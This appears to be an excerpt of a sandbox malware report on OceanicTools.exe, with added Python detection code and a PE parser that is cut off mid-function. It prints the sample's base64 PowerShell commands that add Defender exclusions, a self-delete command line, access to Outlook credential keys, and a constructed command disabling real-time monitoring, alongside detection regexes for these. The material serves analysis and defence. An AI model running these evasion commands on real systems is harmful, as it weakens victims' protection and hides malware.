Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\reg.exe "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" "computersystem" "get" "manufacturer"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\reg.exe "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" "computersystem" "get" "manufacturer"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000
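The process-creation entries above show the chain in full: OceanicTools.exe probes the disk enumeration key and the computer manufacturer, runs two base64-wrapped PowerShell commands, launches the dropped executable, and the dropped executable later removes itself through cmd.exe with a ping used as a sleep. The two base64 arguments decode to `Add-MpPreference -ExclusionPath "C:\Users\alfons\foekseyrkkzyooxy"` and `Add-MpPreference -ExclusionPath "C:\Users\alfons\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"`, that is, Defender exclusions for the drop directory and for the payload. Note that the encoded text names the user alfons while the report elsewhere shows the path as C:\Users\user, so the literal blob is machine-specific and a detection should key on the decoded cmdlet, not on the base64 text. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it walks a list of constructed process events (the command lines of pids 100 to 104 are copied from the entries above; the pids, parent names and the -EncodedCommand event for pid 105 are invented for illustration), decodes inline FromBase64String() arguments as UTF-8 and -EncodedCommand blobs as UTF-16LE, and flags Defender-preference tampering, the ping-then-del self-delete, and the reg/wmic hardware probes.

```python
"""Command-line triage for process-creation events.  Added example, not Joe Sandbox code."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed events.  Command lines of pids 100-104 are copied from the report's
# "Process created" entries; pids, parent names and pid 105 are invented.
_ENC_BLOB = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"pid": 100, "parent": "OceanicTools.exe",
     "cmd": '"reg" "query" "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"'},
    {"pid": 101, "parent": "OceanicTools.exe",
     "cmd": '"wmic" "computersystem" "get" "manufacturer"'},
    {"pid": 102, "parent": "OceanicTools.exe",
     "cmd": '"powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('
            "'QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki'"
            ')); Invoke-Expression $cmd"'},
    {"pid": 103, "parent": "OceanicTools.exe",
     "cmd": '"powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('
            "'QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi'"
            ')); Invoke-Expression $cmd"'},
    {"pid": 104, "parent": "qflwedtkihuzyxlg.exe",
     "cmd": '"C:\\Windows\\System32\\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & '
            'Del /f /q "C:\\Users\\user\\foekseyrkkzyooxy\\qflwedtkihuzyxlg.exe"'},
    {"pid": 105, "parent": "OceanicTools.exe",          # constructed, not in the report
     "cmd": "powershell -NoP -EncodedCommand " + _ENC_BLOB},
]

# Inline [Convert]::FromBase64String('...') argument (UTF-8 text in this sample).
B64_ARG_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
# -EncodedCommand and its short forms carry UTF-16LE text.
ENC_CMD_RE = re.compile(r"(?:-e|-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DEFENDER_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-(?:Exclusion\w+|Disable\w+)", re.I)
SELF_DELETE_RE = re.compile(r"\bping\b.*?-n\s+\d+.*?&\s*del\b.*?/f", re.I)
HARDWARE_PROBES = {
    "reg query Services\\Disk\\Enum":
        re.compile(r"\breg\b.*?\bquery\b.*?Services\\Disk\\Enum", re.I),
    "wmic computersystem get manufacturer":
        re.compile(r"\bwmic\b.*?computersystem.*?\bget\b.*?manufacturer", re.I),
}


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def decode_b64(blob: str, utf16: bool = False) -> Optional[str]:
    """Decode a base64 blob to text; UTF-16LE for -EncodedCommand, UTF-8 otherwise."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:            # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le" if utf16 else "utf-8", errors="replace")


def decoded_payloads(cmd: str) -> List[str]:
    """Every base64 argument found in the command line, decoded."""
    texts = [decode_b64(b) for b in B64_ARG_RE.findall(cmd)]
    texts += [decode_b64(b, utf16=True) for b in ENC_CMD_RE.findall(cmd)]
    return [t for t in texts if t]


def triage(event: dict) -> List[Finding]:
    cmd, pid = event["cmd"], event["pid"]
    findings = []
    for text in decoded_payloads(cmd):
        rule = "defender_exclusion_tamper" if DEFENDER_RE.search(text) else "encoded_powershell"
        findings.append(Finding(pid, rule, text))
    if SELF_DELETE_RE.search(cmd):
        findings.append(Finding(pid, "ping_del_self_delete", cmd))
    for label, rx in HARDWARE_PROBES.items():
        if rx.search(cmd):
            findings.append(Finding(pid, "hardware_probe", label))
    return findings


def triage_all(events) -> List[Finding]:
    return [f for e in events for f in triage(e)]


if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.rule}: {f.detail}")
```

The decode step matters more than the pattern list: the same cmdlet reaches the endpoint either as a UTF-8 blob inside FromBase64String, as here, or as a UTF-16LE -EncodedCommand argument, and a rule written against the raw command line sees neither.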
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: dbgcore.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 (CLSID_WbemLocator: the WMI client instantiating a locator to connect to a namespace)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll (CLR resource-string DLL; benign on its own)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (the Outlook profile subtree holding account settings and stored mail passwords; consistent with the "Tries to steal Mail credentials" signature)
Source: OceanicTools.exe Static PE information: Virtual size of .text is bigger than 0x100000
Source: OceanicTools.exe Static PE information: Image base 0x140000000 > 0x60000000 (0x140000000 is the default image base for 64-bit executables, so this entry alone carries no signal)
Source: OceanicTools.exe Static file information: File size 23282688 > 1048576
Source: OceanicTools.exe Static PE information: Raw size of .text (0x11a7200) is bigger than 0x100000
Source: OceanicTools.exe Static PE information: Raw size of .data (0x263800) is bigger than 0x100000
Source: OceanicTools.exe Static PE information: Raw size of .rdata (0x16f000) is bigger than 0x100000
Source: OceanicTools.exe Static PE information: DllCharacteristics HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: OceanicTools.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
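The static entries above are threshold checks on PE header fields. As an added example, not part of the report or its tooling, the following stdlib-only Python walks the DOS, COFF and PE32+ headers and the section table and reproduces those checks, phrased like the report's entries. It runs against a constructed header-only image that carries the values the report gives for OceanicTools.exe (image base, the three raw section sizes, the DllCharacteristics flags, a debug directory, a .buildid section); the section virtual sizes and RVAs, the .buildid size and the debug directory RVA/size are assumptions, since the report only states the thresholds the real values exceed.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_DIRECTORY_ENTRY_DEBUG = 6
ONE_MIB = 0x100000
# Section names an ordinary MSVC link produces; anything else gets reported, which is
# why .buildid (and .xdata in the dropped files) shows up in the report.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".bss", ".CRT"}


def parse_pe(data):
    """Walk the DOS, COFF and PE32+ optional headers plus the section table and
    return the fields the static checks need. Only PE32+ (64-bit) is handled."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_hdr = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, file_hdr + 2)[0]
    size_opt = struct.unpack_from("<H", data, file_hdr + 16)[0]
    opt = file_hdr + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
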